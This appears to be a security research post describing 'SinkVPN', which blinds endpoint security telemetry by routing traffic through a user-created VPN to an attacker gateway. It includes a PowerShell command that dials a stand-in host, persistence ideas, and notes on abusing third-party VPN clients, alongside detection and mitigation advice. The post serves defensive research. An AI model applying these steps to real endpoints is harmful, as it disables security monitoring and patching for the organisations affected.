SinkVPN: Redirecting endpoint cloud telemetry by abusing usermode VPN tunnels 

Introduction 

Operating systems assume that an interactive user may establish a Virtual Private Network whenever they need one.  

In Windows, this is the user-scope phone-book entry created by Add-VpnConnection; elevation is required only if the optional -AllUserConnection flag is present [Microsoft]

MacOS shows the same behaviour in System Settings ▸ Network ▸ Add VPN Configuration; no administrator password is needed once the network extension exists [Apple]

Linux desktops that run NetworkManager authorise any console user (or anyone in the netdev group) to create and activate a VPN via D-Bus, provided auth-polkit=false is left at its default. [Ubuntu]  

Android, iOS and ChromeOS also expose a VPN feature that forces every packet; including those from system apps; through the selected tunnel and can optionally block traffic that tries to bypass it. [Google] [Google]  

When such a tunnel is configured for full routing (the default unless a split tunnel is explicitly defined) the kernel installs a 0/0 route via the VPN adapter. It’s also possible split tunnel by pushing specific routes via the VPN to selectively tunnel only the traffic of interest, avoiding the need to route all traffic through the VPN.

From that moment every process on the host; including security sensors, update clients and compliance beacons affeted by new route; sends traffic through an attacker-controlled gateway. By dropping connections routed by the malicious tunnel, a threat actor can blind cloud telemetry without touching local firewalls, registry keys, kernel drivers or DNS settings.

We call this post-exploitation method SinkVPN. 

SinkVPN: A minimal proof-of-concept 

Setting up a malicious VPN connection, such as SinkVPN, can be easily accomplished with single commands on various operating systems. For example, on Windows, a little PowerShell, is enough to create and activate the connection: 

# Create and configure a per-user VPN connection named “SinkVPN” 

Add-VpnConnection -Name “SinkVPN” -ServerAddress “vpn.badguy.tld” -TunnelType IKEv2 -AuthenticationMethod Eap -EncryptionLevel Maximum -Force 

#Dial the newly created VPN connection 

rasdial “SinkVPN” 

Analogous commands are available for tools such as `nmcli`, `scutil –nc`, the `am` intents on Android or the iOS GUI. 

Once the connection is established, the operating system inserts a default route through the new network adapter. On Windows, for example, a successful connection is logged as Event ID 20225/20226 in the RAS client, as documented by Microsoft. 

On the attacker side, is possible to choose to route all traffic or only those routes that are of interest. The VPN server need to implement specific firewall rules (using tools such as `nft`, `iptables`, `pf` or `wg-quick` PostUp configurations) to selectively control traffic. This allows requests directed to certain security backends, patch mirrors, license portals or remote management tools to be dropped, while all other traffic is forwarded to ensure that the system remains functional. And this is how it is done, there is no more mystery.

Although this type of connection disappears at the end of the session, it is possible to implement persistence mechanisms that allow for its automatic reconnection. This can be achieved through a login script, such as Scheduled Tasks on Windows, LaunchAgents on macOS, or through `crontab –user` on Linux. On Android, a BroadcastReceiver can also be used to achieve this goal. 

The whole process is completed without requiring administrative privileges, making it an accessible and difficult to detect threat. 

Proprietary VPN clients magnify the risk 

Defenders sometimes lock the native VPN pane yet overlook the third-party VPN agents already installed on most corporate endpoints. These clients ship a privileged service that dials tunnels on behalf of any user who imports a profile: 

• FortiClient 7.x — once the FortiClient VPN Scheduler service is set to Automatic the GUI Remote Access ▸ Add Connection accepts new entries with no UAC prompt. A community thread confirms that “the client no longer requires admin rights” [Reddit]

• Check Point Endpoint VPN — the first launch opens Site Wizard. Any user can enter a gateway name; the choice is saved to trac.config and the SYSTEM service trac.exe establishes the tunnel. [Checkpoint] 

• Cisco Secure Client (AnyConnect 5) — if the profile flag <UserControllable>true</UserControllable> is left in its default state, users may import an XML that sets <AutoConnectOnStart>true</AutoConnectOnStart>[Cisco]

• OpenVPN-GUI / WireGuard-UI — dropping a .ovpn or wg.conf file in the user-config directory makes it immediately connectable; the helper services run as NT AUTHORITY\SYSTEM [OpenVPN]. 

Because each service runs with the highest integrity, the malicious tunnel’s route outranks every existing adapter, even if the operating-system VPN module is disabled by policy. 

Impact beyond EDR 

Throughout this article, SinkVPN is illustrated primarily as a technique for evading Endpoint Detection and Response software, that was the purpose for which we used it in our exercises, but any cloud function that expects the endpoint to initiate an outbound connection is affected: 

• Patch and update infrastructure (Windows Update, SUS/CDN, Linux repositories) 

• Mobile-device-management policies (Intune, Jamf, Workspace ONE) 

• Data-loss-prevention and CASB telemetry 

• Remote monitoring and management beacons 

• Licence and compliance audits 

What changes is not the nature of the traffic but the assumption that it will reach the internet unhindered. 

Detailed comparison with existing telemetry-blocking methods 

SinkVPN is characterized by its lack of elevation, absence of lasting artifacts, and comprehensive protocol coverage across various platforms. 

Name	Privilege	Artefact	Scope	Cross-OS	Tool
SinkVPN	User	Transient VPN adapter & route	All protocols (0/0)	Yes	Private
WFP call-outs	User → driver‐signed; often admin for persistence	Registry entries and custom driver	Selected processes/ports	Windows	EDR Silencer [GitHub]
Local firewall rules	Admin	Visible rules in wf.msc	Ports / IPs	Windows Linux	“Firewall EDR Silencer” [Medium]
NRPT / hosts hijack	Admin (hosts); user for NRPT via registry	Modified text / registry	DNS only	Windows	EDR Silencer & Beyond [Blu Raven Academy]
Static route poisoning	Admin	Extra routes in table	Selected IP ranges	Windows Linux	Many Scripts

Detection and monitoring 

Relying on agent self-protection is insufficient. Effective detection combines three angles: 

1. Network-topology drift: stream any route changes to SIEM and alert when the default gateway changes. This may be a race condition.

2. VPN connection events: collect Windows RasClient 20225/20226, macOS scncagent, Android VpnManager and third-party client logs (FortiClient, Check Point). This also may be a race condition between you and the tunnel dial-up.

3. Heartbeat correlation: if cloud services report the same host as offline shortly after a VPN event, raise an incident. Perhaps the best approach. By the way, a server should never be disconnected beyond the time of a reboot.

Mitigation strategies 

The following are some of the mitigation strategies that should be considered: 

• Restrict who can create VPN profiles: Intune or Group Policy (Prevent addition of new VPN profiles) on Windows, MDM payloads on Apple devices, managed-users=false in /etc/NetworkManager for Linux. 

• Filter outbound VPN protocols (IKEv2, L2TP/IPsec, SSTP, WireGuard, OpenVPN) at the perimeter or force them through a proxy that the attacker cannot influence. 

• Lock third-party VPN GUIs: FortiClient EMS Disable Add/Delete, Check Point :block_sites true, Cisco Secure Client <RestrictPreference>Strict</RestrictPreference>. 

Limitations 

SinkVPN cannot suppress sensors that fall back to direct L2 connections on the corporate LAN. TLS pinning blocks possibilities of in-tunnel interception, although outright packet-drop remains effective.  

Relevance assessment

A survey of academic databases, security conference proceedings and public code repositories up to 17 May 2025 shows extensive writing on WFP-based blocking (EDRSilencer, EDRPrison) and DNS or firewall evasion, but no publication describing telemetry suppression achieved solely via unprivileged, user controlled VPN routing across multiple operating systems.  

SinkVPN therefore highlights a gap in current defensive controls. 

Conclusion 

SinkVPN reminds us that the ability for any user to “just add a VPN” is not a harmless convenience.  

On Windows, Linux, macOS, iOS, Android; and inside many proprietary VPN clients; the same feature can be weaponised to divert and selectively drop cloud-bound traffic from security, management and compliance services.  

Effective defence is therefore less about locking a single module and more about treating outbound VPN establishment as a privileged operation, continuously monitoring changes in default routing, and correlating those changes with unexpected silence from the endpoint. 

(The information above is provided for defensive research and blue-team readiness. Test only in controlled environments and comply with applicable laws.)